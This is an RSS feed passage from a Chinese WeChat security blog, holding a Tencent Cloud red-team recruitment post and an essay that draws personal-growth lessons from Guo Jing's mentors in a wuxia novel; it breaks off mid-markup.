<?xml version="1.0" encoding="UTF-8"?><rss version="2.0" xmlns:content="http://purl.org/rss/1.0/modules/content/">
  <channel>
    <title>认知独省</title>
    <link>https://wechat2rss.xlab.app/feed/83f81eece114fa0cb211ab5379fda72760dc5b68.xml</link>
    <description>信息安全、安全攻防、团队管理、个人成长&#xA;(wechat feed made by @ttttmr https://wechat2rss.xlab.app)</description>
    <managingEditor> (认知独省)</managingEditor>
    <image>
      <url>https://wx.qlogo.cn/mmhead/Q3auHgzwzM7RrJwbD2mzicpDhyGicF7xicL1Q6vWOPpeuY6KnNicsoTB5A/0</url>
      <title>认知独省</title>
      <link>https://wechat2rss.xlab.app/feed/83f81eece114fa0cb211ab5379fda72760dc5b68.xml</link>
    </image>
    <item>
      <title>腾讯云鼎攻防招聘</title>
      <link>https://mp.weixin.qq.com/s?__biz=MzU0NTI4MDQwMQ==&amp;mid=2247484220&amp;idx=1&amp;sn=531f07f8309ce594b5922f619336137b</link>
      <description>腾讯云鼎攻防持续招聘~</description>
      <content:encoded><![CDATA[<p><span>程远ing</span> <span>2026-03-09 08:37</span> <span style="display: inline-block;">北京</span></p>






  
  <p><img src="https://wechat2rss.xlab.app/img-proxy/?k=ec6cc76b&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_jpg%2FQdeplRBbFXWvZ3tiapicVNtWqpXN2icNib8UAOmR7R4QtyVYSeX3jxaZ4EhaticSwXvI3rr8GEMIJmq8qNQddLSUr5E2n1hhxws5R0LibLBFCVibds%2F0%3Fwx_fmt%3Djpeg"/></p>
  <p>腾讯云鼎攻防持续招聘~</p>
  <p><span leaf="">岗位：高级攻防工程师/专家</span></p><p><span leaf="">坐标：北京（集团） 、深圳（集团） ；西安（子公司）、武汉（子公司）</span></p><p><span leaf=""><span textstyle="" style="font-weight: bold;">岗位职责</span></span></p><p><span leaf="">1. 开展前沿攻防技术研究，构建攻防对抗体系；</span></p><p><span leaf="">2. 内部红蓝演练、渗透测试，验证腾讯云安全防御水位，促进平台安全建设；</span></p><p><span leaf="">3. 内部安全产品测试，提升内部产品力；</span></p><p><span leaf="">4. 承接对外的商业化红蓝项目，实战攻防拿目标权限。</span></p><p><span leaf=""><span textstyle="" style="font-weight: bold;">岗位要求</span></span></p><p><span leaf="">1. 本科，攻防渗透经验超3年；</span></p><p><span leaf="">2. 技能标签：漏洞、木马、武器、对抗、靶标；</span></p><p><span leaf="">3. 擅长后渗透，具备独立的大型内网渗透经验，能够对抗防护产品（端侧、流量测），极致的权限维持手法，能够突破隔离获得靶标权限；</span></p><p><span leaf="">4. 精通一门或多门技术：后渗透（主需求）、漏洞挖掘、武器开发、移动安全、云安全、人工智能 等维度；</span></p><p><span leaf="">5. 在细分技术领域，有自己的攻防知识体系，能够主动带节奏推进工作。</span></p><p style="line-height: 1.5em;"><span leaf="">有意者可后台发消息或投递简历到</span></p><p style="line-height: 1.5em;"><span leaf="">Y2hueXVhbnBhbkB0ZW5jZW50LmNvbQ==</span></p><p style="line-height: 1.5em;"><span leaf="">这个图片后期可能会失效，<span textstyle="" style="color: rgb(255, 0, 0);">但攻防高手持续招聘（可联系后台）</span>，欢迎各位大神自荐和推荐。</span></p><p style="text-align: center;line-height: 1.5em;" nodeleaf=""><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="2.493927125506073" data-s="300,640" data-type="jpeg" data-w="988" type="block" data-imgfileid="100000562" src="https://wechat2rss.xlab.app/img-proxy/?k=56b22efc&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_jpg%2FQdeplRBbFXWSG5OAINdZVib7nG0PkjFma40wpyibTJv9ibeywD8Vugbhz4Jvz9szqdsYlI7fR8q0Vr042kFePWoSxnqib9CrA7POMg8fxugHkHc%2F640%3Fwx_fmt%3Djpeg%26from%3Dappmsg"/></p><p style="display: none;"><mp-style-type data-value="3"></mp-style-type></p>



<p><a href="https://wechat2rss.xlab.app/link-proxy/?k=f454970d&amp;r=1&amp;u=https%3A%2F%2Fmp.weixin.qq.com%2Fs%3F__biz%3DMzU0NTI4MDQwMQ%3D%3D%26mid%3D2247484220%26idx%3D1%26sn%3D531f07f8309ce594b5922f619336137b">跳转微信打开</a></p>
]]></content:encoded>
      <pubDate>Mon, 09 Mar 2026 08:37:00 +0800</pubDate>
    </item>
    <item>
      <title>武侠一哥郭靖个人成长史（侠之大者）</title>
      <link>https://mp.weixin.qq.com/s?__biz=MzU0NTI4MDQwMQ==&amp;mid=2247484208&amp;idx=1&amp;sn=e10570e192ad1dd52f19aa6fbc2c1505</link>
      <description>为什么郭靖在成长的过程中，有那么多的顶级大佬帮助他？是什么能量成就他的成长和成功？</description>
      <content:encoded><![CDATA[<p>
原创 <span>程远ing</span> <span>2025-02-03 06:16</span> <span style="display: inline-block;">北京</span>
</p>

<p>为什么郭靖在成长的过程中，有那么多的顶级大佬帮助他？是什么能量成就他的成长和成功？</p>
<p></p>



<p>
<img src="https://wechat2rss.xlab.app/img-proxy/?k=3f166af3&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_jpg%2FgS0DP6tuCtLf7PdYhrgeTiaEp3yPmu5UoWNwVwgmG1Kby3ibjtPbweMqu2HRCNib6TqSXSkjVUz8P3u3GXcHObMHQ%2F0%3Fwx_fmt%3Djpeg"/>
</p>


<p style="text-align: left;margin-bottom: 0px;margin-top: 0px;"><span leaf="" style="color:rgba(0, 0, 0, 0.9);font-size:17px;font-family:&#34;mp-quote&#34;, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height:1.6;letter-spacing:0.034em;font-style:normal;font-weight:normal;">        春节期间上映了</span><span leaf="" style="color:rgba(0, 0, 0, 0.9);font-size:17px;font-family:&#34;mp-quote&#34;, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height:1.6;letter-spacing:0.034em;font-style:normal;font-weight:normal;">射雕英雄传：侠之大者 (2025)</span><span leaf="" style="color:rgba(0, 0, 0, 0.9);font-size:17px;font-family:&#34;mp-quote&#34;, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height:1.6;letter-spacing:0.034em;font-style:normal;font-weight:normal;"> 。上次在TLG潜龙会第一次线下聚会分享过个人成长（郭靖）和团队管理（武当派）方向的内容。借假期，归档分享。</span></p><section style="text-align: center;" nodeleaf=""><img class="rich_pages wxw-img" data-imgfileid="100000552" data-ratio="1.4119922630560928" data-s="300,640" type="block" data-type="png" data-w="1034" src="https://wechat2rss.xlab.app/img-proxy/?k=48afd06d&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FgS0DP6tuCtLf7PdYhrgeTiaEp3yPmu5Uo1LsiaaKX3X4FxrdNRoiapx3OFMM0S084SaXibtVuVx05WqKLibfvbibxTXw%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></section><p style="text-align: left;margin-bottom: 0px;margin-top: 0px;"><span leaf="" style="color:rgba(0, 0, 0, 0.9);font-size:17px;font-family:&#34;mp-quote&#34;, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height:1.6;letter-spacing:0.034em;font-style:normal;font-weight:normal;">       <span textstyle="" style="color: rgb(255, 0, 0);"> 为什么郭靖在成长的过程中，有那么多的顶级大佬帮助他？是什么能量成就他的成长和成功？</span>本文分析下郭靖在一些关键节点对“老师们”的付出与回报。</span></p><p style="text-align: left;margin-bottom: 0px;margin-top: 0px;"><span leaf="" style="color:rgba(0, 0, 0, 0.9);font-size:17px;font-family:&#34;mp-quote&#34;, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height:1.6;letter-spacing:0.034em;font-style:normal;font-weight:normal;"><br/></span></p><p style="text-align: left;margin-bottom: 0px;margin-top: 0px;"><span leaf="" style="color:rgba(0, 0, 0, 0.9);font-size:17px;font-family:&#34;mp-quote&#34;, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height:1.6;letter-spacing:0.034em;font-style:normal;font-weight:normal;">第一任师父：<span textstyle="" style="color: rgb(255, 0, 0);font-weight: bold;">李萍</span>（郭靖的母亲）</span></p><p style="text-align: left;margin-bottom: 0px;margin-top: 0px;"><span leaf="" style="color:rgba(0, 0, 0, 0.9);font-size:17px;font-family:&#34;mp-quote&#34;, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height:1.6;letter-spacing:0.034em;font-style:normal;font-weight:normal;">正确的价值观：诚实守信、责任感、乐于助人，也教导他铭记家国大义。</span></p><blockquote><p><span leaf="">李萍见儿子头上脸上鞭痕累累，好不心疼，但听哲别说起儿子的刚强侠义，便道：“乖孩子，为人该当如此。”（小郭靖救了哲别后）</span></p><p><span leaf=""><br/></span></p><p><span leaf="">李萍又道：“人生百年，转眼即过，生死又有什么大不了？只要一生行事无愧于心，也就不枉了在这人世走一遭。倘若别人负了我们，也不必念他过恶。你记着我的话罢！（自杀前说的话）</span></p></blockquote><p style="text-align: left;margin-bottom: 0px;margin-top: 0px;"><span leaf="" style="color:rgba(0, 0, 0, 0.9);font-size:17px;font-family:&#34;mp-quote&#34;, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height:1.6;letter-spacing:0.034em;font-style:normal;font-weight:normal;"><br/></span></p><p style="text-align: left;margin-bottom: 0px;margin-top: 0px;"><span leaf="" style="color:rgba(0, 0, 0, 0.9);font-size:17px;font-family:&#34;mp-quote&#34;, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height:1.6;letter-spacing:0.034em;font-style:normal;font-weight:normal;">第二任师傅/贵人：<span textstyle="" style="color: rgb(255, 0, 0);font-weight: bold;">哲别（神箭手）/托雷/铁木真</span></span></p><p style="text-align: left;margin-bottom: 0px;margin-top: 0px;"><span leaf="" style="color:rgba(0, 0, 0, 0.9);font-size:17px;font-family:&#34;mp-quote&#34;, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height:1.6;letter-spacing:0.034em;font-style:normal;font-weight:normal;">付出：救了哲别性命、刚强的性格（</span><span leaf="" style="color:rgba(0, 0, 0, 0.9);font-size:17px;font-family:&#34;mp-quote&#34;, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height:1.6;letter-spacing:0.034em;font-style:normal;font-weight:normal;">原文：我不说</span><span leaf="" style="color:rgba(0, 0, 0, 0.9);font-size:17px;font-family:&#34;mp-quote&#34;, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height:1.6;letter-spacing:0.034em;font-style:normal;font-weight:normal;">）</span></p><p style="text-align: left;margin-bottom: 0px;margin-top: 0px;"><span leaf="" style="color:rgba(0, 0, 0, 0.9);font-size:17px;font-family:&#34;mp-quote&#34;, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height:1.6;letter-spacing:0.034em;font-style:normal;font-weight:normal;">回报：射箭的技能（蒙古军的核心技能）；托雷结拜（小时候玩伴）；铁木真赏识（救过铁木真、华筝）；带兵打仗-实战的本领；回中原的第一手人脉就是蒙古贵族</span></p><blockquote><p><span leaf="">哲别感念郭靖的恩义，对他母子照顾周到，准拟郭靖年纪稍大，就把自己的箭法武功倾囊相授。</span></p><p><span leaf=""><br/></span></p><p><span leaf="">铁木真见是幼子平素在颈中所带的黄金项圈，微微一笑，道：“你们两个以后可要相亲相爱，互相扶助。”拖雷和郭靖点头答应。</span></p></blockquote><p style="text-align: left;margin-bottom: 0px;margin-top: 0px;"><span leaf="" style="color:rgba(0, 0, 0, 0.9);font-size:17px;font-family:&#34;mp-quote&#34;, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height:1.6;letter-spacing:0.034em;font-style:normal;font-weight:normal;"><br/></span></p><p style="text-align: left;margin-bottom: 0px;margin-top: 0px;"><span leaf="" style="color:rgba(0, 0, 0, 0.9);font-size:17px;font-family:&#34;mp-quote&#34;, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height:1.6;letter-spacing:0.034em;font-style:normal;font-weight:normal;">第三任师父：<span textstyle="" style="color: rgb(255, 0, 0);font-weight: bold;">江南七怪</span></span></p><p style="text-align: left;margin-bottom: 0px;margin-top: 0px;"><span leaf="" style="color:rgba(0, 0, 0, 0.9);font-size:17px;font-family:&#34;mp-quote&#34;, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height:1.6;letter-spacing:0.034em;font-style:normal;font-weight:normal;">缘由：江南七怪与丘处机的赌约</span></p><p style="text-align: left;margin-bottom: 0px;margin-top: 0px;"><span leaf="" style="color:rgba(0, 0, 0, 0.9);font-size:17px;font-family:&#34;mp-quote&#34;, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height:1.6;letter-spacing:0.034em;font-style:normal;font-weight:normal;">回报：武功技能、重信义（忠厚）、侠义价值观</span></p><blockquote><p><span leaf="">ps:江南七怪，言传身教一诺千金，为了跟丘处机打赌，去大漠12年，悉心培养“天资愚钝”的小郭靖；柯镇恶的人品深刻影响郭靖：他的疾恶如仇、爱憎分明、豪迈慷慨、正直无私，都言传身教地向郭靖展示：一个正派的江湖人应该怎样行事。</span></p></blockquote><p style="text-align: left;margin-bottom: 0px;margin-top: 0px;"><span leaf="" style="color:rgba(0, 0, 0, 0.9);font-size:17px;font-family:&#34;mp-quote&#34;, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height:1.6;letter-spacing:0.034em;font-style:normal;font-weight:normal;"><br/></span></p><p style="text-align: left;margin-bottom: 0px;margin-top: 0px;"><span leaf="" style="color:rgba(0, 0, 0, 0.9);font-size:17px;font-family:&#34;mp-quote&#34;, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height:1.6;letter-spacing:0.034em;font-style:normal;font-weight:normal;">第四任师傅：<span textstyle="" style="color: rgb(255, 0, 0);font-weight: bold;">马钰道长</span>（全真教）</span></p><p style="text-align: left;margin-bottom: 0px;margin-top: 0px;"><span leaf="" style="color:rgba(0, 0, 0, 0.9);font-size:17px;font-family:&#34;mp-quote&#34;, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height:1.6;letter-spacing:0.034em;font-style:normal;font-weight:normal;">回报：两年玄门正宗内功，同期七怪的武功教授迅速提升 【思定则情忘，体虚则气运，心死则神活，阴盛则阳消。】</span></p><p style="text-align: left;margin-bottom: 0px;margin-top: 0px;"><span leaf="" style="color:rgba(0, 0, 0, 0.9);font-size:17px;font-family:&#34;mp-quote&#34;, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height:1.6;letter-spacing:0.034em;font-style:normal;font-weight:normal;"><br/></span></p><p style="text-align: left;margin-bottom: 0px;margin-top: 0px;"><span leaf="" style="color:rgba(0, 0, 0, 0.9);font-size:17px;font-family:&#34;mp-quote&#34;, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height:1.6;letter-spacing:0.034em;font-style:normal;font-weight:normal;">第五任贵人：<span textstyle="" style="color: rgb(255, 0, 0);font-weight: bold;">黄蓉</span></span></p><p style="text-align: left;margin-bottom: 0px;margin-top: 0px;"><span leaf="" style="color:rgba(0, 0, 0, 0.9);font-size:17px;font-family:&#34;mp-quote&#34;, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height:1.6;letter-spacing:0.034em;font-style:normal;font-weight:normal;">付出：欣赏小叫花（大餐、汗血宝马、貂）简单、真诚打动</span><span leaf="" style="color:rgba(0, 0, 0, 0.9);font-size:17px;font-family:&#34;mp-quote&#34;, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height:1.6;letter-spacing:0.034em;font-style:normal;font-weight:normal;">    </span><o:page></o:page></p><p style="text-align: left;margin-bottom: 0px;margin-top: 0px;"><span leaf="" style="color:rgba(0, 0, 0, 0.9);font-size:17px;font-family:&#34;mp-quote&#34;, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height:1.6;letter-spacing:0.034em;font-style:normal;font-weight:normal;">回报：后面所有的成事/成功，基本都有黄蓉的驱动</span></p><blockquote><p><span leaf="">ps:郭靖请黄蓉那顿大餐花了十九两七钱四分，折合现在人民币大概是20000元（普通人会花两万元请一个小叫花子吃饭么？）；当然赠送小红马的价值更高（普通人别说汗血宝马，八手的3系宝马BMW也不舍得啊...），当然这跟郭靖出场的条件有关，他来中原时成吉思汗赏了他黄金10斤作为盘缠（如果按照现在黄金600/g,价值300万元~，所以他可能也不太在乎这两万的餐费，2333），当然武侠世界，金钱不是绝对的标准，武功和侠义才是核心度量衡。</span></p></blockquote><p style="text-align: left;margin-bottom: 0px;margin-top: 0px;"><span leaf="" style="color:rgba(0, 0, 0, 0.9);font-size:17px;font-family:&#34;mp-quote&#34;, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height:1.6;letter-spacing:0.034em;font-style:normal;font-weight:normal;"><br/></span></p><p style="text-align: left;margin-bottom: 0px;margin-top: 0px;"><span leaf="" style="color:rgba(0, 0, 0, 0.9);font-size:17px;font-family:&#34;mp-quote&#34;, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height:1.6;letter-spacing:0.034em;font-style:normal;font-weight:normal;">第六任师父：<span textstyle="" style="color: rgb(255, 0, 0);font-weight: bold;">洪七公</span></span></p><p style="text-align: left;margin-bottom: 0px;margin-top: 0px;"><span leaf="" style="color:rgba(0, 0, 0, 0.9);font-size:17px;font-family:&#34;mp-quote&#34;, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height:1.6;letter-spacing:0.034em;font-style:normal;font-weight:normal;">付出：忠厚的品质（适合这个武功）、黄蓉给做了很多好吃的（洪七又贪吃）</span></p><p style="text-align: left;margin-bottom: 0px;margin-top: 0px;"><span leaf="" style="color:rgba(0, 0, 0, 0.9);font-size:17px;font-family:&#34;mp-quote&#34;, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height:1.6;letter-spacing:0.034em;font-style:normal;font-weight:normal;">回报：降龙十八掌（核心技能），成为北丐的弟子（具备去桃花岛求亲的入场券）</span></p><p style="text-align: left;margin-bottom: 0px;margin-top: 0px;"><span leaf="" style="color:rgba(0, 0, 0, 0.9);font-size:17px;font-family:&#34;mp-quote&#34;, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height:1.6;letter-spacing:0.034em;font-style:normal;font-weight:normal;"><br/></span></p><p style="text-align: left;margin-bottom: 0px;margin-top: 0px;"><span leaf="" style="color:rgba(0, 0, 0, 0.9);font-size:17px;font-family:&#34;mp-quote&#34;, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height:1.6;letter-spacing:0.034em;font-style:normal;font-weight:normal;">第七任师傅：<span textstyle="" style="color: rgb(255, 0, 0);font-weight: bold;">周伯通</span>（结拜大哥）</span></p><p style="text-align: left;margin-bottom: 0px;margin-top: 0px;"><span leaf="" style="color:rgba(0, 0, 0, 0.9);font-size:17px;font-family:&#34;mp-quote&#34;, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height:1.6;letter-spacing:0.034em;font-style:normal;font-weight:normal;">付出：桃花岛赴约（信义）、实力、共情（陪玩，代价：摔了七八百交）、救老顽童两次（抵御箫声、吸蛇毒-利他）</span></p><p style="text-align: left;margin-bottom: 0px;margin-top: 0px;"><span leaf="" style="color:rgba(0, 0, 0, 0.9);font-size:17px;font-family:&#34;mp-quote&#34;, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height:1.6;letter-spacing:0.034em;font-style:normal;font-weight:normal;">回报：结拜大哥； 空明拳、左右互搏术、九阴真经全文背诵（遥遥领先；求婚成功）</span></p><blockquote><p><span leaf="">郭靖只摔得全身都是乌青瘀肿，前前后后摔了七八百交，仗着身子硬朗，才咬牙挺住，但周伯通在洞中十五年悟出来的七十二手“空明拳”（共情&amp;陪玩阶段）</span></p><p><span leaf=""><br/></span></p><p><span leaf="">郭靖听他语音发颤，知他受毒甚深，若非以上乘内功强行抵御，早已昏迷，慌急之中，弯下腰去就在他伤口上吮吸。周伯通急叫：“使不得，这蛇毒非比寻常，你一吸就死。”郭靖这时只求救他性命，哪里还想到自身安危，右臂牢牢按住他下身，不住在他创口上吮吸。周伯通待要挣扎阻止，全身已然酸软，动弹不得，再过一阵，竟晕了过去。（周伯通中毒后，郭靖舍己救人。利他）</span></p></blockquote><p style="text-align: left;margin-bottom: 0px;margin-top: 0px;"><span leaf="" style="color:rgba(0, 0, 0, 0.9);font-size:17px;font-family:&#34;mp-quote&#34;, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height:1.6;letter-spacing:0.034em;font-style:normal;font-weight:normal;"><br/></span></p><p style="text-align: left;margin-bottom: 0px;margin-top: 0px;"><span leaf="" style="color:rgba(0, 0, 0, 0.9);font-size:17px;font-family:&#34;mp-quote&#34;, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height:1.6;letter-spacing:0.034em;font-style:normal;font-weight:normal;">第八任师傅：<span textstyle="" style="color: rgb(255, 0, 0);font-weight: bold;">一灯大师</span></span></p><p style="text-align: left;margin-bottom: 0px;margin-top: 0px;"><span leaf="" style="color:rgba(0, 0, 0, 0.9);font-size:17px;font-family:&#34;mp-quote&#34;, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height:1.6;letter-spacing:0.034em;font-style:normal;font-weight:normal;">付出：bypass渔樵耕读（技术过硬）、真诚的性格&amp;利他（救了一灯性命(PK 瑛姑)）、帮助一灯恢复功力</span></p><p style="text-align: left;margin-bottom: 0px;margin-top: 0px;"><span leaf="" style="color:rgba(0, 0, 0, 0.9);font-size:17px;font-family:&#34;mp-quote&#34;, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height:1.6;letter-spacing:0.034em;font-style:normal;font-weight:normal;">回报：救黄蓉；获得九阴真经-梵文总纲（二次华山论剑 实战能力 &gt;300招 东邪&amp;北丐）</span></p><blockquote><p><span leaf="">一灯惊叹无已，说道：“此中原委，我曾听重阳真人说过。撰述九阴真经的那位高人黄裳不但读遍道藏，更精通内典，识得梵文。他撰完真经，下卷的最后一章是真经的总旨，真经最高秘奥，全在总旨之中，前面所有难以明解的关锁，总旨乃是钥匙。他忽然想起，此经倘若落入心术不正之人手中，持之以横行天下，无人制他得住。但若将这章阐明最高武学的总旨毁去，总是舍不得，于是改写为梵文，却以中文音译，心想此经是否能传之后世，已然难言，中土人氏能通梵文者极少，兼修上乘武学者更属稀有</span></p></blockquote><p style="text-align: left;margin-bottom: 0px;margin-top: 0px;"><span leaf="" style="color:rgba(0, 0, 0, 0.9);font-size:17px;font-family:&#34;mp-quote&#34;, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height:1.6;letter-spacing:0.034em;font-style:normal;font-weight:normal;"><br/></span></p><p style="text-align: left;margin-bottom: 0px;margin-top: 0px;"><span leaf="" style="color:rgba(0, 0, 0, 0.9);font-size:17px;font-family:&#34;mp-quote&#34;, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, 